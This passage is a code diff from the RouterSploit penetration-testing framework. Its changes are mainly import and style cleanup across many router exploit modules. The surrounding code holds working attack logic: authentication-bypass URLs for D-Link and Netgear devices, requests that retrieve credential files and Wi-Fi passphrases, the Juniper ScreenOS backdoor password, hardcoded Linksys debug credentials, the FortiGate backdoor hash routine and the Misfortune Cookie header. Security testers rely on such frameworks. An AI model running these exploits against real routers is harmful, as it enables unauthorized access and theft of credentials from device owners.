+        return False  # target is not vulnerable

routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py

 import requests
-import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,22 +17,22 @@ class Exploit(exploits.Exploit):
         'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
         'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
         'authors': [
-            'Craig Heffner', # vulnerability discovery
-            'Karol Celin', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'Craig Heffner',  # vulnerability discovery
+            'Karol Celin',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
-         ],
-         'targets': [
+        ],
+        'targets': [
             'D-Link DIR-300',
             'D-Link DIR-600',
             'D-Link DIR-615 revD',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         if self.check():
@@ -47,21 +51,20 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
-			return False
-	 	
+            return False
+
         # checking if authentication can be baypassed
         url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
         try:
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
-            
+            return None  # could not be verified
+
         if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
-            return True # target vulnerable
+            return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,21 +19,21 @@ class Exploit(exploits.Exploit):
         'name': 'D-Link DIR-300 & DIR-600 & DIR-615 Info Disclosure',
         'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
         'authors': [
-            'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'tytusromekiatomek <tytusromekiatomek[at]inbox.com>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'http://seclists.org/bugtraq/2013/Dec/11'
-         ],
-         'targets': [
+        ],
+        'targets': [
             'D-Link DIR-300 (all)',
             'D-Link DIR-600 (all)',
             'D-Link DIR-615 (fw 4.0)',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
@@ -52,7 +58,6 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
 
@@ -60,11 +65,10 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
         if len(creds):
-            return True # target vulnerable
+            return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/dlink/dir_300_600_rce.py

 import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_status,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
         'name': 'D-LINK DIR-300 & DIR-600 RCE',
         'description': 'Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
         'authors': [
-            'Michael Messner <devnull[at]s3cur1ty.de>', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Michael Messner <devnull[at]s3cur1ty.de>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
@@ -22,7 +28,7 @@ class Exploit(exploits.Exploit):
         ],
         'targets': [
             'D-Link DIR 300',
-            'D-Link DIR 600', 
+            'D-Link DIR 600',
         ]
     }
 
@@ -30,7 +36,7 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(80, 'Target Port')
 
     def run(self):
-        if self.check() == True:
+        if self.check() is True:
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             self.command_loop()
@@ -72,4 +78,3 @@ class Exploit(exploits.Exploit):
             return True
 
         return False
-

routersploit/modules/exploits/dlink/dir_645_password_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,19 +19,19 @@ class Exploit(exploits.Exploit):
         'name': 'D-Link DIR-645 Password Disclosure',
         'description': 'Module exploits D-Link DIR-645 password disclosure vulnerability.',
         'authors': [
-            'Roberto Paleari <roberto[at]greyhats.it>', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'Roberto Paleari <roberto[at]greyhats.it>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt'
-         ],
-         'targets': [
+        ],
+        'targets': [
             'D-Link DIR-645 (Versions < 1.03)',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(8080, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(8080, 'Target port')  # default port
 
     def run(self):
         # address and parameters
@@ -57,11 +63,10 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         # address and parameters
         url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
-        data = {"SERVICES": "DEVICE.ACCOUNT"} 
+        data = {"SERVICES": "DEVICE.ACCOUNT"}
 
         # connection
         try:
@@ -75,7 +80,6 @@ class Exploit(exploits.Exploit):
         creds = re.findall(regular, re.sub('\s+', '', res))
 
         if len(creds):
-            return True # target vulnerable
+            return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/dlink/dns_320l_327l_rce.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
         'name': 'D-LINK DNS-320L & DIR-327L RCE',
         'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
         'authors': [
-            'Gergely Eberhardt', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Gergely Eberhardt',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf',
@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(80, 'Target Port')
 
     def run(self):
-        if self.check() == True:
+        if self.check() is True:
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             self.command_loop()
@@ -65,13 +71,10 @@ class Exploit(exploits.Exploit):
 
         try:
             r = requests.get(url)
-            res = r.text
         except:
             return None
 
-
         if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:
             return True
 
         return False
-

routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -17,17 +23,17 @@ class Exploit(exploits.Exploit):
             'Jose Rodriguez # vulnerability discovery',
             'Ivan Sanz # vulnerability discovery',
             'Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module',
-         ],
+        ],
         'references': [
             'http://seclists.org/fulldisclosure/2015/May/129'
-         ],
-         'targets': [
+        ],
+        'targets': [
             'D-Link DSL-2750B EU_1.01',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
@@ -50,7 +56,7 @@ class Exploit(exploits.Exploit):
             val = re.findall(regexp, res)
 
             if len(val):
-                creds.append((d,val[0]))
+                creds.append((d, val[0]))
 
         if len(creds):
             print_success("Credentials found!")
@@ -61,7 +67,6 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
 
@@ -73,6 +78,5 @@ class Exploit(exploits.Exploit):
 
         if any(map(lambda x: x in res, ["SSID", "PassPhrase"])):
             return True   # target vulnerable
-                           
-        return False  # target not vulnerable
 
+        return False  # target not vulnerable

routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py

 import requests
 import json
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+    print_table,
+    print_status,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,19 +20,19 @@ class Exploit(exploits.Exploit):
         'name': 'D-Link DWR-932 Info Disclosure',
         'description': 'Module explois information disclosure vulnerability in D-Link DWR-932 devices. It is possible to retrieve sensitive information such as credentials.',
         'authors': [
-            'Saeed reza Zamanian' # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'Saeed reza Zamanian'  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://www.exploit-db.com/exploits/39581/',
-         ],
-         'targets': [
+        ],
+        'targets': [
             'D-Link DWR-932',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
@@ -58,7 +65,6 @@ class Exploit(exploits.Exploit):
 
         headers = ("Parameter", "Value")
         print_table(headers, *rows)
-        
 
     def check(self):
         url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
@@ -67,10 +73,9 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         if 'wifi_AP1_ssid' in res:
-            return True # target is vulnerable
+            return True  # target is vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py

@@ -8,7 +8,12 @@ import tty
 import sys
 from paramiko.py3compat import u
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -20,8 +25,8 @@ class Exploit(exploits.Exploit):
         'name': 'FortiGate OS 4.x-5.0.7 Backdoor',
         'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
         'authors': [
-            'operator8203', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'operator8203',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
@@ -92,7 +97,6 @@ class Exploit(exploits.Exploit):
         finally:
             termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
 
- 
     def check(self):
         client = paramiko.SSHClient()
         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
@@ -127,4 +131,3 @@ class Exploit(exploits.Exploit):
         m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
         h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
         return [h]
-

routersploit/modules/exploits/juniper/screenos_backdoor.py

 import paramiko
 import telnetlib
-import select
-import socket
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -15,19 +17,19 @@ class Exploit(exploits.Exploit):
         'name': 'Juniper ScreenOS Backdoor',
         'description': 'Module exploits Juniper ScreenOS Authentication Backdoor vulnerability. If the target is is possible to authentiate to the device.',
         'authors': [
-            'hdm', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'hdm',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor',
-         ],
-         'targets': [
+        ],
+        'targets': [
             'Juniper ScreenOS 6.2.0r15 to 6.2.0r18',
             'Juniper ScreenOS 6.3.0r12 to 6.3.0r20',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
 
     username = "admin"
     password = "<<< %s(un='%s') = %u"
@@ -58,12 +60,12 @@ class Exploit(exploits.Exploit):
             tn.write(self.password + "\r\n")
             tn.write("\r\n")
 
-            (i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
 
             if i != -1:
                 return False
             else:
-                if any(map(lambda x: x in res, ["#", "$",">"])):
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
                     print_success("Telnet - Successful authentication")
                     tn.write("\r\n")
                     tn.interact()
@@ -71,12 +73,12 @@ class Exploit(exploits.Exploit):
             tn.close()
         except:
             print_error("Connection Error")
-            return 
+            return
 
     def check(self):
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
-   
+
         try:
             ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
         except:
@@ -92,13 +94,13 @@ class Exploit(exploits.Exploit):
             tn.write(self.password + "\r\n")
             tn.write("\r\n")
 
-            (i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
             tn.close()
 
             if i != -1:
                 return False
             else:
-                if any(map(lambda x: x in res, ["#", "$",">"])):
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
                     tn.close()
                     return True
             tn.close()
@@ -106,4 +108,3 @@ class Exploit(exploits.Exploit):
             return False
 
         return False
-

routersploit/modules/exploits/linksys/wap54gv3_rce.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
         'name': 'Linksys WAP54Gv3',
         'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
         'authors': [
-            'Phil Purviance', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Phil Purviance',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://seclists.org/bugtraq/2010/Jun/93',
@@ -28,7 +34,7 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(80, 'Target Port')
 
     def run(self):
-        if self.check() == True:
+        if self.check() is True:
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             self.command_loop()
@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
             r = requests.post(url, data=data, auth=("Gemtek", "gemtekswd"))
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
             return True
 
         return False
-

routersploit/modules/exploits/multi/misfortune_cookie.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,20 +17,20 @@ class Exploit(exploits.Exploit):
         'name': 'Misfortune Cookie',
         'description': 'Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.',
         'authors': [
-            'Check Point <www.checkpoint.com>', # vulnerability discovery
-            'Jan Trencansky', # proof of concept exploit
-            'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
-         ],
+            'Check Point <www.checkpoint.com>',  # vulnerability discovery
+            'Jan Trencansky',  # proof of concept exploit
+            'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'http://mis.fortunecook.ie/'
-         ],
-         'targets': [
+        ],
+        'targets': [
              'multi'
-         ]
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         if self.check():
@@ -43,25 +48,22 @@ class Exploit(exploits.Exploit):
                    'Accept-Encoding': 'gzip, deflate',
                    'Cache-Control': 'no-cache',
                    'Cookie': 'C107373883=/omg1337hax'}
-        
 
         try:
             r = requests.get(url, headers=headers)
-            
+
             if r.status_code != 404:
-                return False # not rompage 
+                return False  # not rompage
             else:
                 if 'server' in r.headers:
                     server = r.headers.get('server')
-                    
+
                     if re.search('RomPager', server) is not None:
                         if re.search('omg1337hax', r.text) is not None:
-                            return True # device is vulnerable
+                            return True  # device is vulnerable
                         else:
-                            return None # might be still vulnerable but could not be verified
+                            return None  # might be still vulnerable but could not be verified
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
-        
         return False  # target not vulnerable
-

routersploit/modules/exploits/netgear/n300_auth_bypass.py

 import requests
-import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,19 +17,19 @@ class Exploit(exploits.Exploit):
         'name': 'Netgear N300 Auth Bypass',
         'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.',
         'authors': [
-            'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'Daniel Haake <daniel.haake[at]csnc.de>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
-         ],
-         'targets': [
+        ],
+        'targets': [
             'Netgear N300',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         if self.check():
@@ -37,11 +41,11 @@ class Exploit(exploits.Exploit):
 
     def check(self):
         url = sanitize_url("{}:{}/".format(self.target, self.port))
-       
+
         try:
             r = requests.get(url)
         except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
-            return None # target could not be verified
+            return None  # target could not be verified
 
         if r.status_code == requests.codes.unauthorized:
             url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
@@ -51,4 +55,3 @@ class Exploit(exploits.Exploit):
                 return True
 
         return False  # target not vulnerable
-

routersploit/modules/scanners/dlink_scan.py

-from routersploit import *
 from os import listdir
 from os.path import isfile, join
 import imp
 
+from routersplot import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+)
+
 
 class Exploit(exploits.Exploit):
     """
@@ -12,20 +18,19 @@ class Exploit(exploits.Exploit):
         'name': 'D-Link Scanner',
         'description': 'Scanner module for D-Link devices',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
-        exploits = []
         rootpath = 'routersploit/modules/'
         path = 'exploits/dlink/'
 
         # only py exploit files
-        modules = [f.replace(".py", "") for f in listdir(rootpath+path) if isfile(join(rootpath+path, f)) and f.endswith(".py") and f != "__init__.py"]
+        modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
 
         vulns = []
         for module_name in modules:
@@ -47,7 +52,7 @@ class Exploit(exploits.Exploit):
             else:
                 print_status("{} could not be verified".format(f))
 
-        print 
+        print
         if len(vulns):
             print_success("Device is vulnerable!")
             for v in vulns:
@@ -58,4 +63,3 @@ class Exploit(exploits.Exploit):
 
     def check(self):
         print_error("Check method is not available")
-

routersploit/utils.py

@@ -122,7 +122,8 @@ class LockedIterator(object):
         self.lock = threading.Lock()
         self.it = it.__iter__()
 
-    def __iter__(self): return self
+    def __iter__(self):
+        return self
 
     def next(self):
         self.lock.acquire()
@@ -170,7 +171,7 @@ def print_table(headers, *args, **kwargs):
         headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill)))
         headers_separator_line = "".join((
             headers_separator_line,
-            '{:<{}}'.format(header_separator*len(header), current_line_fill)
+            '{:<{}}'.format(header_separator * len(header), current_line_fill)
         ))
 
     print()